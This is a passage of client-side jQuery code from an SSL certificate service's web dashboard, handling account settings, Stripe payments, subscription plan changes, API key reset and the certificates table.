	var userChangePassword = false;

	body.find('[data-required=&quot;true&quot;]:visible').each(function() {

		if (!$(this).val()) {
		errors ++;
		$(this).addClass('error');
		} else {
		$(this).removeClass('error');
		}

	});

	if (errors &gt; 0) {
	error = true;
	}

	// check password strength, custom error
	if (body.find('[name=&quot;account[details][new_password]&quot;]').is(':visible')) {

		userChangePassword = true;

		if (!passwordStrength(body.find('[name=&quot;account[details][new_password]&quot;]').val())) {

			body.find('[name=&quot;account[details][new_password]&quot;]').addClass('error');
			generalInfo('show', 'error', 'New password must contain: 8 characters or more, including lowercase, uppercase characters and a number.');
			return false;

		} else {
			body.find('[name=&quot;account[details][new_password]&quot;]').removeClass('error');
		}

	}

	if (error === true) {
	generalInfo('show', 'error', 'There were errors. Please fill all required fields and try again.');
	return false;
	} else {
	generalInfo('hide');
	}

	button.addClass('loading');

	var passwordValue = body.find('[name=&quot;account[details][new_password]&quot;]').val();

	var	postData = {
		email_address: body.find('[name=&quot;account[details][email]&quot;]').val(),
		current_password: generateSHA256(body.find('[name=&quot;account[details][current_password]&quot;]').val()),
		new_password: generateSHA256(body.find('[name=&quot;account[details][new_password]&quot;]').val()),
		new_password_again: generateSHA256(body.find('[name=&quot;account[details][new_password_repeat]&quot;]').val()),
		first_name: body.find('[name=&quot;account[details][first_name]&quot;]').val(),
		last_name: body.find('[name=&quot;account[details][last_name]&quot;]').val(),
		address: body.find('[name=&quot;account[details][address]&quot;]').val(),
		post_code: body.find('[name=&quot;account[details][postal_code]&quot;]').val(),
		state: body.find('[name=&quot;account[details][state]&quot;]').val(),
		city: body.find('[name=&quot;account[details][city]&quot;]').val(),
		country_code: body.find('[name=&quot;account[details][country_code]&quot;]').val(),
		company_name: body.find('[name=&quot;account[details][company_name]&quot;]').val(),
		website_url: body.find('[name=&quot;account[details][website_url]&quot;]').val(),
		tax_id: body.find('[name=&quot;account[details][tax_id]&quot;]').val(),
	};

	var postDataJSON = JSON.stringify(postData);
	//console.log(postDataJSON);

	$.ajax({
		type: &quot;POST&quot;,
		url: '/ajax/advanced_ajax_handler.php?type=edit_account&amp;_cpt=' + getCookie('_cpt'),
		data: ({ postArray: postDataJSON }),
		dataType: &quot;json&quot;,
		error: function(XMLHttpRequest, textStatus, errorThrown) {
     		//alert(textStatus + ', ' + errorThrown);
  		},
		success: function(data){

			if (data.success === 1) {

				if (userChangePassword === true) {

					// store new encryption key
					storeEncryptionKey(passwordValue);

					// invalidate all private keys
					invalidateAllPrivateKeys();

				}

				button.removeClass('loading');

				reloadPage(['show', 'success', 'Your account details have been updated.']);
				return false;

			}  else {

				button.removeClass('loading');

				generalInfo('show', 'error', translateError(data.message));
				return false;

			}

		}

	});

});


/* AJAX - SAVE ACCOUNT DETAILS */
body.on('submit', 'form[id=&quot;notification&quot;]', function(e) {
    &quot;use strict&quot;;
    e.preventDefault();

    let button = $(this).find('button[type=&quot;submit&quot;]');

    button.addClass('loading');
    let	postData = {
        notificationOptOutStatus: body.find('[name=&quot;notification[status]&quot;]:checked').val(),
        notificationOptOutExpiration: body.find('[name=&quot;notification[expiration]&quot;]:checked').val(),
        notificationAcmeOptOutStatus: body.find('[name=&quot;notification[status_acme]&quot;]:checked').val(),
        notificationAcmeOptInExpiration: body.find('[name=&quot;notification[expiration_acme]&quot;]:checked').val(),
    };

    let postDataJSON = JSON.stringify(postData);

    $.ajax({
        type: &quot;POST&quot;,
        url: '/ajax/advanced_ajax_handler.php?type=upsert_user_settings&amp;_cpt=' + getCookie('_cpt'),
        data: ({ postArray: postDataJSON }),
        dataType: &quot;json&quot;,
        error: function(XMLHttpRequest, textStatus, errorThrown) {
            generalInfo('show', 'error', translateError('Error updating account details. Maybe your internet connection is gone? Please try again later.'));
            return false;
        },
        success: function(data){
            if (data.success === 1) {
                button.removeClass('loading');
                reloadPage(['show', 'success', 'Your user settings have been updated.']);
                return false;
            }  else {
                button.removeClass('loading');
                generalInfo('show', 'error', translateError(data.message));
                return false;
            }
        }
    });
});

body.on('click', '[class=&quot;protection_enable&quot;]', function(e) {
    &quot;use strict&quot;;
    e.preventDefault();

    button.addClass('loading');
    let	postData = {
        notificationOptOutStatus: body.find('[name=&quot;notification[status]&quot;]:checked').val(),
        notificationOptOutExpiration: body.find('[name=&quot;notification[expiration]&quot;]:checked').val(),
        notificationAcmeOptOutStatus: body.find('[name=&quot;notification[status_acme]&quot;]:checked').val(),
        notificationAcmeOptInExpiration: body.find('[name=&quot;notification[expiration_acme]&quot;]:checked').val(),
    };

    let postDataJSON = JSON.stringify(postData);

    $.ajax({
        type: &quot;POST&quot;,
        url: '/ajax/advanced_ajax_handler.php?type=upsert_user_settings&amp;_cpt=' + getCookie('_cpt'),
        data: ({ postArray: postDataJSON }),
        dataType: &quot;json&quot;,
        error: function(XMLHttpRequest, textStatus, errorThrown) {
            generalInfo('show', 'error', translateError('Error updating account details. Maybe your internet connection is gone? Please try again later.'));
            return false;
        },
        success: function(data){
            if (data.success === 1) {
                button.removeClass('loading');
                reloadPage(['show', 'success', 'Your user settings have been updated.']);
                return false;
            }  else {
                button.removeClass('loading');
                generalInfo('show', 'error', translateError(data.message));
                return false;
            }
        }
    });
});


/* POPUP */
function openPopup(actionID, customObject, callback) {

	var fileToLoad;

	var popupContent;

	// close all dropdown menus
	closeAllDropdownMenus();

	// disable scrolling
	body.addClass('popup_open');

	// init popup
	body.find('.popup_backdrop').show();
	body.find('.popup').show();

	scrollToTop(0);

	switch (actionID) {

		// placeholder for custom popups
		default:
		fileToLoad = actionID;
		break;

	}

	$.ajax({
		type: &quot;POST&quot;,
		url: '/popups/'+fileToLoad+'.php?action_id='+actionID,
		data: ({ postArray: customObject }),
		error: function(XMLHttpRequest, textStatus, errorThrown) {
			//alert(textStatus + ', ' + errorThrown);
		},
		success: function(data){

			// add content to popup window
			body.find('.popup .window').html(data);

			// remove loading and show content
			body.find('.popup .window').removeClass('loading');
			body.find('.popup .window .content').fadeIn(100);

			if (actionID === 'add_payment_method') {
				stripeGetSetupIntentSecret();
			}

			if (actionID === 'checkout_via_popup') {
				initStripe('elements_enabled');
			}

			if (currentPage &amp;&amp; currentPage === &quot;certificates&quot;) {
				// ZERO-33 only allow users to click on revocation certificate button, when they clicked confirmation checkbox
				// ZERO-234 and if users specified revocation reason
				let userDidSpecifyRevokationReason = false;
				let userClickedRevocationTerms = false;

				$(&quot;#revocation_reason&quot;).change(() =&gt; {
					userDidSpecifyRevokationReason = true;
					checkIfUserIsAllowedToRevocate();
				})

				$(&quot;#revocation-confirmation-checkbox&quot;).change(function () {
					this.checked ? userClickedRevocationTerms = true : userClickedRevocationTerms = false;
					checkIfUserIsAllowedToRevocate();
				});

				function checkIfUserIsAllowedToRevocate() {
					$(&quot;#confirm-revoke-certificate-btn&quot;).attr(&quot;disabled&quot;, true);

					if (userDidSpecifyRevokationReason &amp;&amp; userClickedRevocationTerms) {
						$(&quot;#confirm-revoke-certificate-btn&quot;).attr(&quot;disabled&quot;, false);
					}
				}
			}

			if (callback) {
				callback();
			}

			return false;
		}

	});

}


body.on('click', '[data-action=&quot;popup&quot;]', function () {

	var actionID = $(this).attr('data-action-id');

	openPopup(actionID);

});


function closePopup() {

	body.removeClass('popup_open');

	body.find('.popup .content').remove();
	body.find('.popup .window').addClass('loading');

	body.find('.popup_backdrop').hide();
	body.find('.popup').hide();

}

body.on('click', '[data-action=&quot;close_popup&quot;]', function() {

	closePopup();

});


/* DELETE ACCOUNT - TYPE KEYUP */
body.on('keyup', '[name=&quot;account[delete][type_delete]&quot;]', function() {

	if ($(this).val() == 'DELETE') {
	body.find('button[type=&quot;submit&quot;][form=&quot;account[delete]&quot;]').addClass('enabled');
	} else {
	body.find('button[type=&quot;submit&quot;][form=&quot;account[delete]&quot;]').removeClass('enabled');
	}

});


/* AJAX - DELETE ACCOUNT */
body.on('submit', 'form[name=&quot;account[delete]&quot;]', function(e) {
	&quot;use strict&quot;;
	e.preventDefault();

	var button = $(this).find('button[type=&quot;submit&quot;]');
	var typeDelete = $(this).find('[name=&quot;account[delete][type_delete]&quot;]');

	if (typeDelete.val() === 'DELETE') {
	generalInfo('hide');
	} else {
	generalInfo('show', 'error', 'An error occurred. Please try again.');
	return false;
	}

	button.addClass('loading');

	$.ajax({
		type: &quot;POST&quot;,
		url: '/ajax/advanced_ajax_handler.php?type=delete_account&amp;_cpt=' + getCookie('_cpt'),
		dataType: &quot;json&quot;,
		error: function(XMLHttpRequest, textStatus, errorThrown) {
     		//alert(textStatus + ', ' + errorThrown);
  		},
		success: function(data){

			if (data.success === 1) {

				window.location.href = '/login/deleted';
				return false;

			}  else {

				button.removeClass('loading');

				generalInfo('show', 'error', translateError(data.message));
				return false;

			}

		}

	});

});


/* AJAX - LOG OUT */
function logOut(command) {

    let redirectURL = '/login/bye';

    if (command === 'encryption_key') {
	    redirectURL = 'login/session';
	}

	$.ajax({
		type: &quot;POST&quot;,
		url: '/ajax/public_ajax_handler.php?type=sign_out',
		dataType: &quot;json&quot;,
		error: function(XMLHttpRequest, textStatus, errorThrown) {
     		//alert(textStatus + ', ' + errorThrown);
  		},
		success: function(data){

			if (data.success === 1) {

				window.location.href = redirectURL;
				return false;

			}  else {

				console.log(data.message);
				return false;

			}

		}

	});

}

body.on('click', '[data-action=&quot;logout&quot;]', function(e) {
	&quot;use strict&quot;;
	e.preventDefault();

	body.addClass('loading');
	body.addClass('logging_out');

	logOut();

});



/* AJAX - CHANGE PLAN */
body.on('click', '[data-action=&quot;change_plan&quot;]', function(e) {
	&quot;use strict&quot;;
	e.preventDefault();

	var button = $(this);

	var planID = $(this).attr('data-action-id');
	var actionType = $(this).attr('data-action-type');

	var	postData = {
		plan_id: planID,
		payment_frequency: body.find('[name=&quot;user[payment_frequency]&quot;]').val(),
	};

	var postDataJSON = JSON.stringify(postData);

	if (actionType === 'downgrade' &amp;&amp; !button.attr('data-action-confirmed')) {
		const customData = {
			current_plan_name: body.find('.plan.selected .top_section span').first().text(),
			target_plan_name: $(this).closest('.plan').find('.top_section span').text(),
			show_survey: &quot;&quot;,
			message: &quot;&quot;
		};
		$.ajax({
			type: &quot;POST&quot;,
			url: '/ajax/advanced_ajax_handler.php?type=check_plan_change_forbidden&amp;_cpt=' + getCookie('_cpt'),
			data: ({postArray: postDataJSON}),
			dataType: &quot;json&quot;,
			success: function (data) {
				customData.show_survey = data.success;
				customData.message = data.message;

				openPopup('confirm_downgrade', customData);

				if (data.success) {
					body.on('submit', 'form[name=&quot;confirm_downgrade&quot;]', function (event) {
						event.preventDefault();

						// add confirmation tag for a second, re-submit action, then remove confirmation tag
						button.attr('data-action-confirmed', 'true').click().removeAttr('data-action-confirmed');

						closePopup();
					});
				}
			}
		});

		return false;
	}

	button.addClass('loading');

	$.ajax({
		type: &quot;POST&quot;,
		url: '/ajax/advanced_ajax_handler.php?type=change_subscription_plan&amp;_cpt=' + getCookie('_cpt'),
		data: ({ postArray: postDataJSON }),
		dataType: &quot;json&quot;,
		error: function(XMLHttpRequest, textStatus, errorThrown) {
     		//alert(textStatus + ', ' + errorThrown);
  		},
		success: function(data){

			if (data.success === 1) {

				if (data.message.payment_required == 1 &amp;&amp; data.message.invoice_id) {

					// upgrade
					goToPage('/checkout/'+data.message.invoice_id, 'checkout', 'checkout', null, data.message.invoice_id, false, null, null);

				} else {

					// downgrade
					button.removeClass('loading');

					var billingPeriodEnd = 'month';

					if (body.find('[name=&quot;user[payment_frequency]&quot;]').val() == 'yearly') {
					billingPeriodEnd = 'year';
					}

					generalInfo('show', 'success', 'Your downgrade has been scheduled and will come into effect at the end of this '+ billingPeriodEnd +'.');

				}

				return false;

			}  else {

				button.removeClass('loading');

				generalInfo('show', 'error', translateError(data.message));
				return false;

			}

		}

	});

});



/* AJAX - STRIPE PAYMENTS - PSD2 */
var stripe;
var stripe2;
var elements;
var cardElement;
var cardButton;
var clientSecret;

function initStripe(detail) {

	// init Stripe
	if (detail === 'charge_ex_cc') {
	stripe2 = Stripe(window.stripePublishableKey);
	} else {
	stripe = Stripe(window.stripePublishableKey);
	}

	if (detail === 'elements_enabled') {

		elements = stripe.elements({
		// force english
		locale: 'en',
		});

		cardElement = elements.create('card');
		cardElement.mount('#card-element');
		cardButton = document.getElementById('card-button');
		clientSecret = cardButton.dataset.secret;

	}

}


/* AJAX - STRIPE PAYMENT 2019 - GET PAYMENT INTENT CLIENT SECRET */
function stripeGetSetupIntentSecret() {

	/*if (body.find('[name=&quot;stripe_enabled&quot;]').val() !== 'true') {
	return false;
	}*/

	$.ajax({
		url: '/ajax/advanced_ajax_handler.php?type=stripe_create_setupintent',
		dataType: 'json',
		success: function(json) {

			// add client secret to relevant data attr
			body.find('#card-button').attr('data-secret', json.message.client_secret);
			body.find('#card-button').attr('data-setup-intent-id', json.message.id);

			initStripe('elements_enabled');

		}

	});

}


/* AJAX - STRIPE ADD CARD WITHOUT CHARGING */
body.on('click', '.stripe_add_card', function(event) {

	event.preventDefault();

	// if billing address required, validate billing address
	if (body.find('.billing_address').length !== -1) {

		var error = false;
		var errors = 0;

		body.find('[data-required=&quot;true&quot;]:visible').each(function() {

			if (!$(this).val()) {
			errors ++;
			$(this).addClass('error');
			} else {
			$(this).removeClass('error');
			}

		});

		if (errors &gt; 0) {
		error = true;
		}

		if (error === true) {
		generalInfo('show', 'error', 'There were errors. Please enter your complete billing details and try again.');
		return false;
		} else {
		generalInfo('hide');
		}

	}

	$(cardButton).addClass('loading');

	  stripe.handleCardSetup(
		clientSecret, cardElement, {}
	  ).then(function(result) {

		if (result.error) {

			$(cardButton).removeClass('loading');

			// report error
			generalInfo('show', 'error', 'Error: '+result.error.message+' (Code: &quot;'+result.error.code+'&quot;)');
			//console.log(result.error);

		} else {

			// call to ajax handler to save credit card
			var postData = {
				setup_intent_id: body.find('#card-button').attr('data-setup-intent-id'),
				billing_first_name: body.find('[name=&quot;payment_method[add][billing_address][first_name]&quot;]').val(),
				billing_last_name: body.find('[name=&quot;payment_method[add][billing_address][last_name]&quot;]').val(),
				billing_address: body.find('[name=&quot;payment_method[add][billing_address][address]&quot;]').val(),
				billing_post_code: body.find('[name=&quot;payment_method[add][billing_address][post_code]&quot;]').val(),
				billing_state: body.find('[name=&quot;payment_method[add][billing_address][state]&quot;]').val(),
				billing_city: body.find('[name=&quot;payment_method[add][billing_address][city]&quot;]').val(),
				billing_country_code: body.find('[name=&quot;payment_method[add][billing_address][country_code]&quot;]').val(),
			};

			var postDataJSON = JSON.stringify(postData);
			//console.log(postDataJSON);

			$.ajax({
				type: 'POST',
				url: '/ajax/advanced_ajax_handler.php?type=add_stripe_payment_profile',
				dataType: 'json',
				data: ({ postArray: postDataJSON }),
				success: function(json) {

					if (json.success == 1) {

						// reload page if card saved successfully
						generalInfo('show', 'success', 'Your credit card has been added.');
						reloadPage();

						setTimeout( function(){
						closePopup();
						}, 1000);

					} else {

						generalInfo('show', 'error', 'An error occurred. Please try again or contact support.');

						$(cardButton).removeClass('loading');

					}

				}

			});

		}

	  });

});



/* AJAX - STRIPE ACTION ADD CARD WITH CHARGING */
body.on('click', '.stripe_add_and_charge', function(event) {

	event.preventDefault();

	var useCase = $(this).attr('data-use-case') || 'default';

	// if billing address required, validate billing address
	if (body.find('.billing_address').length !== -1) {

		var error = false;
		var errors = 0;

		body.find('[data-required=&quot;true&quot;]:visible').each(function() {

			if (!$(this).val()) {
			errors ++;
			$(this).addClass('error');
			} else {
			$(this).removeClass('error');
			}

		});

		if (errors &gt; 0) {
		error = true;
		}

		if (error === true) {
		generalInfo('show', 'error', 'There were errors. Please enter your complete billing details and try again.');
		return false;
		} else {
		generalInfo('hide');
		}

	}

	$(cardButton).addClass('loading');

	stripe.handleCardPayment(
	  clientSecret, cardElement, {
		// not sending any payment_method_data here
		payment_method_data: {}
	  }
	).then(function(result) {

	  if (result.error) {

		  $(cardButton).removeClass('loading');

		  // report error
		  generalInfo('show', 'error', 'Error: '+result.error.message+' (Code: &quot;'+result.error.code+'&quot;)');
		  //console.log(result.error);

	  } else {

		  // call to ajax handler to save credit card
		  var postData = {
			  paymentintent_id: body.find('#card-button').attr('data-payment-intent-id'),
			  billing_first_name: body.find('[name=&quot;payment_method[add][billing_address][first_name]&quot;]').val(),
			  billing_last_name: body.find('[name=&quot;payment_method[add][billing_address][last_name]&quot;]').val(),
			  billing_address: body.find('[name=&quot;payment_method[add][billing_address][address]&quot;]').val(),
			  billing_post_code: body.find('[name=&quot;payment_method[add][billing_address][post_code]&quot;]').val(),
			  billing_state: body.find('[name=&quot;payment_method[add][billing_address][state]&quot;]').val(),
			  billing_city: body.find('[name=&quot;payment_method[add][billing_address][city]&quot;]').val(),
			  billing_country_code: body.find('[name=&quot;payment_method[add][billing_address][country_code]&quot;]').val(),
		  };

		  var postDataJSON = JSON.stringify(postData);
		  //console.log(postDataJSON);

		  $.ajax({
			  type: 'POST',
			  url: '/ajax/advanced_ajax_handler.php?type=stripe_capture_invoice_payment',
			  dataType: 'json',
			  data: ({ postArray: postDataJSON }),
			  success: function(json) {

				  if (json.success == 1) {

                      gtag('event', 'conversion', {
                          'send_to': 'AW-302531871/EGuACPa1ofgCEJ-KoZAB',
                          'transaction_id': ''
                      });
				  	  if (useCase === 'order_wizard') {
                          // show payment success message
                          generalInfo('show', 'success', 'Payment succeeded. Creating your certificate ...');

                          // submit order wizard
                          submitOrderWizard();
                          return false;
					  }

					  // reload page if payment success
					  reloadPage();

				  } else {

				  	  generalInfo('show', 'error', 'An error occurred. Please try again or contact support.');

					  $(cardButton).removeClass('loading');

				  }

			  }

		  });

	  }

	});

});


/* AJAX - STRIPE ACTION CHARGE EXISTING CARD */
body.on('click', '.charge_existing_cc', function(event) {

	event.preventDefault();

	var useCase = $(this).attr('data-use-case') || 'default';

	var chosenPaymentMethod = body.find('[name=&quot;checkout[payment_method][use]&quot;]:checked');
	var paymentMethodID;

	clientSecret = chosenPaymentMethod.attr('data-secret');
	paymentMethodID = chosenPaymentMethod.attr('data-stripe-id');

	initStripe('charge_ex_cc');
	var saveButton = $(this);

	// if billing address required, validate billing address
	if (body.find('.billing_address').length !== -1) {

		var error = false;
		var errors = 0;

		body.find('[data-required=&quot;true&quot;]:visible').each(function() {

			if (!$(this).val()) {
			errors ++;
			$(this).addClass('error');
			} else {
			$(this).removeClass('error');
			}

		});

		if (errors &gt; 0) {
		error = true;
		}

		if (error === true) {
		generalInfo('show', 'error', 'There were errors. Please enter your complete billing details and try again.');
		return false;
		} else {
		generalInfo('hide');
		}

	}

	$(this).addClass('loading');

	stripe2.handleCardPayment(
	  clientSecret,
	  { payment_method: paymentMethodID }
	).then(function(result) {

	  if (result.error) {

		  $(saveButton).removeClass('loading');

		  // report error
		  generalInfo('show', 'error', 'Error: '+result.error.message+' (Code: &quot;'+result.error.code+'&quot;)');
		  //console.log(result.error);

	  } else {

		  // call to ajax handler to save credit card
		  var postData = {
			  paymentintent_id: body.find('#card-button').attr('data-payment-intent-id'),
			  billing_first_name: body.find('[name=&quot;payment_method[add][billing_address][first_name]&quot;]').val(),
			  billing_last_name: body.find('[name=&quot;payment_method[add][billing_address][last_name]&quot;]').val(),
			  billing_address: body.find('[name=&quot;payment_method[add][billing_address][address]&quot;]').val(),
			  billing_post_code: body.find('[name=&quot;payment_method[add][billing_address][post_code]&quot;]').val(),
			  billing_state: body.find('[name=&quot;payment_method[add][billing_address][state]&quot;]').val(),
			  billing_city: body.find('[name=&quot;payment_method[add][billing_address][city]&quot;]').val(),
			  billing_country_code: body.find('[name=&quot;payment_method[add][billing_address][country_code]&quot;]').val(),
		  };

		  var postDataJSON = JSON.stringify(postData);
		  //console.log(postDataJSON);

		  $.ajax({
			  type: 'POST',
			  url: '/ajax/advanced_ajax_handler.php?type=stripe_capture_invoice_payment',
			  dataType: 'json',
			  data: ({ postArray: postDataJSON }),
			  success: function(json) {

				  if (json.success == 1) {

                      gtag('event', 'conversion', {
                          'send_to': 'AW-302531871/EGuACPa1ofgCEJ-KoZAB',
                          'transaction_id': ''
                      });
				  	  if (useCase === 'order_wizard') {
                          // show payment success message
                          generalInfo('show', 'success', 'Payment succeeded. Creating your certificate ...');

                          // submit order wizard
                          submitOrderWizard();
                          return false;
					  }

					  // reload page if payment success
					  reloadPage();

				  } else {

				  	  generalInfo('show', 'error', 'An error occurred. Please try again or contact support.');

					  $(saveButton).removeClass('loading');

				  }

			  }

		  });

	  }

	});

});



/* AJAX - REMOVE PAYMENT METHOD */
body.on('click', '[data-action=&quot;account[payment_method][remove]&quot;]', function(event) {

	event.preventDefault();

	var button = $(this);

	var	postData = {
		profile_id: $(this).attr('data-action-id')
	};

	var postDataJSON = JSON.stringify(postData);
	//console.log(postDataJSON);

	if (!button.attr('data-action-confirmed')) {

		openPopup('confirm_remove_payment_profile');

		body.on('submit', 'form[name=&quot;confirm_remove_payment_profile&quot;]', function(event) {

			event.preventDefault();

			// add confirmation tag for a second, re-submit action, then remove confirmation tag
			button.attr('data-action-confirmed', 'true').click().removeAttr('data-action-confirmed');

		});

		return false;

	}

	body.find('.popup button[type=&quot;submit&quot;]').addClass('loading');

	$.ajax({
		type: &quot;POST&quot;,
		url: '/ajax/advanced_ajax_handler.php?type=remove_payment_profile&amp;_cpt=' + getCookie('_cpt'),
		data: ({ postArray: postDataJSON }),
		dataType: &quot;json&quot;,
		error: function(XMLHttpRequest, textStatus, errorThrown) {
     		//alert(textStatus + ', ' + errorThrown);
  		},
		success: function(data){

			if (data.success === 1) {

				// reload page if removed successfully
				generalInfo('show', 'success', 'Payment method removed.');
				reloadPage();

				setTimeout( function(){
				closePopup();
				}, 1000);


			}  else {

				body.find('.popup button[type=&quot;submit&quot;]').removeClass('loading');
				generalInfo('show', 'error', translateError(data.message));

			}

			return false;

		}

	});

});



/* AJAX - CHANGE PAYMENT METHOD */
body.on('submit', 'form[name=&quot;account[payment_method]&quot;]', function(e) {
	&quot;use strict&quot;;
	e.preventDefault();

	var button = $(this).find('button[type=&quot;submit&quot;]');

	button.addClass('loading');

	var	postData = {
		profile_id: $(this).find('[name=&quot;account[payment_method][switch]&quot;]:checked').val(),
	};

	var postDataJSON = JSON.stringify(postData);
	//console.log(postDataJSON);

	$.ajax({
		type: &quot;POST&quot;,
		url: '/ajax/advanced_ajax_handler.php?type=switch_payment_profile&amp;_cpt=' + getCookie('_cpt'),
		data: ({ postArray: postDataJSON }),
		dataType: &quot;json&quot;,
		error: function(XMLHttpRequest, textStatus, errorThrown) {
     		//alert(textStatus + ', ' + errorThrown);
  		},
		success: function(data){

			if (data.success === 1) {

				button.removeClass('loading');

				reloadPage(['show', 'success', 'Payment method switched.']);

			}  else {

				button.removeClass('loading');

				generalInfo('show', 'error', translateError(data.message));

			}

			return false;

		}

	});

});



/* AJAX - CANCEL CHECKOUT */
body.on('click', '[data-action=&quot;cancel_checkout&quot;]', function(e) {
	&quot;use strict&quot;;
	e.preventDefault();

	var	postData = {
		invoice_id: body.find('[name=&quot;checkout[invoice_id]&quot;]').val(),
	};

	var postDataJSON = JSON.stringify(postData);
	//console.log(postDataJSON);

	body.addClass('loading');

	$.ajax({
		type: &quot;POST&quot;,
		url: '/ajax/advanced_ajax_handler.php?type=cancel_checkout',
		data: ({ postArray: postDataJSON }),
		dataType: &quot;json&quot;,
		error: function(XMLHttpRequest, textStatus, errorThrown) {
     		//alert(textStatus + ', ' + errorThrown);
  		},
		success: function(data){

			body.removeClass('loading');

			if (data.success === 1) {

				goToPage('/subscription', 'subscription', 'subscription', null, null, false, null, null);
				return false;

			}  else {

				generalInfo('show', 'error', translateError(data.message));
				return false;

			}

		}

	});

});


/* AJAX - CANCEL CHECKOUT BY CLOSING CHECKOUT POPUP */
body.on('click', '[data-action=&quot;close_popup_cancel_checkout&quot;]', function(e) {
	&quot;use strict&quot;;
	e.preventDefault();

	var button = $(this);

	var	postData = {
		invoice_id: body.find('[name=&quot;checkout[invoice_id]&quot;]').val(),
	};

	var postDataJSON = JSON.stringify(postData);
	//console.log(postDataJSON);

	button.addClass('loading');

	$.ajax({
		type: &quot;POST&quot;,
		url: '/ajax/advanced_ajax_handler.php?type=cancel_checkout',
		data: ({ postArray: postDataJSON }),
		dataType: &quot;json&quot;,
		error: function(XMLHttpRequest, textStatus, errorThrown) {
     		//alert(textStatus + ', ' + errorThrown);
  		},
		success: function(data){

			closePopup();

			if (data.success === 1) {

				console.log('invoice cancelled by click on [data-action=&quot;close_popup_cancel_checkout&quot;]');
				return false;

			}  else {

				console.log('invoice could not be cancelled. error: ' + translateError(data.message));
				return false;

			}

		}

	});

});



/* AJAX - CHANGE PAYMENT FREQUENCY ON CHECKOUT */
body.on('change', '[name=&quot;checkout[payment_frequency]&quot;]', function(e) {
	&quot;use strict&quot;;
	e.preventDefault();

	var selectedFrequency = body.find('[name=&quot;checkout[payment_frequency]&quot;]:checked').val();
	var planID = body.find('[name=&quot;checkout[plan_id]&quot;]').val();

	var button = $(this);

	var	postData = {
		plan_id: planID,
		payment_frequency: selectedFrequency,
	};

	var postDataJSON = JSON.stringify(postData);
	//console.log(postDataJSON);

	body.find('.form_row.radio.payment_frequency').addClass('disabled');

	$.ajax({
		type: &quot;POST&quot;,
		url: '/ajax/advanced_ajax_handler.php?type=change_subscription_plan&amp;_cpt=' + getCookie('_cpt'),
		data: ({ postArray: postDataJSON }),
		dataType: &quot;json&quot;,
		error: function(XMLHttpRequest, textStatus, errorThrown) {
     		//alert(textStatus + ', ' + errorThrown);
  		},
		success: function(data){

			if (data.success === 1 &amp;&amp; data.message.payment_required == 1 &amp;&amp; data.message.invoice_id) {

				// go to new invoice
				goToPage('/checkout/'+data.message.invoice_id, 'checkout', 'checkout', null, data.message.invoice_id, false, null, null);

			}  else {

				body.find('.form_row.radio.payment_frequency').removeClass('disabled');

				generalInfo('show', 'error', translateError(data.message));
				return false;

			}

		}

	});

});



/* CHECKOUT - SWITCH BETWEEN EXISTING &amp; ADD NEW PAYMENT METHOD */
body.on('click', '[data-action=&quot;checkout_switch_new_existing_payment_method&quot;]', function() {

	var actionType = $(this).attr('data-action-type');

	var addNewContainer = body.find('.checkout_add_new_pm');
	var useExistingContainer = body.find('.checkout_existing_pm');

	generalInfo('hide');

	if (actionType === 'add_new') {
	useExistingContainer.hide();
	addNewContainer.fadeIn(150);
	} else {
	addNewContainer.hide();
	useExistingContainer.fadeIn(150);
	}

});



/* AJAX - RESET ACCESS KEY */
body.on('click', '[data-action=&quot;reset_access_key&quot;]', function(e) {
	&quot;use strict&quot;;
	e.preventDefault();

	var button = $(this);

	if (!button.attr('data-action-confirmed')) {

		openPopup('confirm_reset_access_key');

		body.on('submit', 'form[name=&quot;confirm_reset_access_key&quot;]', function(event) {

			event.preventDefault();

			// add confirmation tag for a second, re-submit action, then remove confirmation tag
			button.attr('data-action-confirmed', 'true').click().removeAttr('data-action-confirmed');

			closePopup();

		});

		return false;

	}

	button.html('Wait ...');

	$.ajax({
		type: &quot;POST&quot;,
		url: '/ajax/advanced_ajax_handler.php?type=reset_access_key&amp;_cpt=' + getCookie('_cpt'),
		dataType: &quot;json&quot;,
		error: function(XMLHttpRequest, textStatus, errorThrown) {
     		//alert(textStatus + ', ' + errorThrown);
  		},
		success: function(data){

			body.removeClass('loading');

			if (data.success === 1) {

				reloadPage(['show', 'success', 'Your API key has been reset.']);
				return false;

			}  else {

				button.html('RESET KEY');

				generalInfo('show', 'error', translateError(data.message));
				return false;

			}

		}

	});

});


/* HELPER FUNCTION TO CLEAN GET VARIABLES IN LOAD TABLE FUNCTION */
function cleanTableGetVariable(variable) {

	if (typeof variable === 'undefined') {
	return false;
	}

	if (variable) {

		// convert to string
		variable = variable + '';

		return variable.replace('search:', '').replace('page:', '');

	}

}


// HELPER FUNCTION TO NORMALIZE DATE (FOR BROWSERS LIKE SAFARI)
function normalizeDate(input, format) {
  format = format || 'yyyy-mm-dd'; // default format
  var parts = input.match(/(\d+)/g),
      i = 0, fmt = {};
  // extract date-part indexes from the format
  format.replace(/(yyyy|dd|mm)/g, function(part) { fmt[part] = i++; });

  return new Date(parts[fmt['yyyy']], parts[fmt['mm']]-1, parts[fmt['dd']]);
}

var entityMap = {
    '&amp;': '&amp;amp;',
    '&lt;': '&amp;lt;',
    '&gt;': '&amp;gt;',
    '&quot;': '&amp;quot;',
    &quot;'&quot;: '&amp;#39;',
    '/': '&amp;#x2F;',
    '`': '&amp;#x60;',
    '=': '&amp;#x3D;'
};

function escapeHtml (string) {
    return String(string).replace(/[&amp;&lt;&gt;&quot;'`=\/]/g, function (s) {
        return entityMap[s];
    });
}

/* AJAX - LOAD/UPDATE CERTIFICATES TABLE */
function loadTable() {

	parameterStatus = body.find('[name=&quot;additional_parameter[status]&quot;]').val() || 'issued';
	parameterSearch = cleanTableGetVariable(body.find('[name=&quot;additional_parameter[search]&quot;]').val()) || '';
	parameterLimit = 10;
	parameterPage = cleanTableGetVariable(body.find('[name=&quot;additional_parameter[pageno]&quot;]').val() ? body.find('[name=&quot;additional_parameter[pageno]&quot;]').val() : 1) || 1;

	const protectionEnabled = $(&quot;section.list&quot;).attr('data-protection-enabled') === &quot;true&quot;;
	const showProtectionColumn = (parameterStatus === &quot;issued&quot; || parameterStatus === &quot;expiring_soon&quot;);
	var	postData = {
		certificate_status: parameterStatus,
		search: parameterSearch,
		limit: parameterLimit,
		page: parameterPage,
	};

	var postDataJSON = JSON.stringify(postData);
	//console.log(postDataJSON);

	var table = body.find('section.list');

	$.ajax({
		type: 'POST',
		url: '/ajax/advanced_ajax_handler.php?type=zerossl_list_certificates&amp;_cpt=' + getCookie('_cpt'),
		data: ({ postArray: postDataJSON }),
		dataType: 'json',
		error: function(XMLHttpRequest, textStatus, errorThrown) {
     		//alert(textStatus + ', ' + errorThrown);
  		},
		success: function(response){
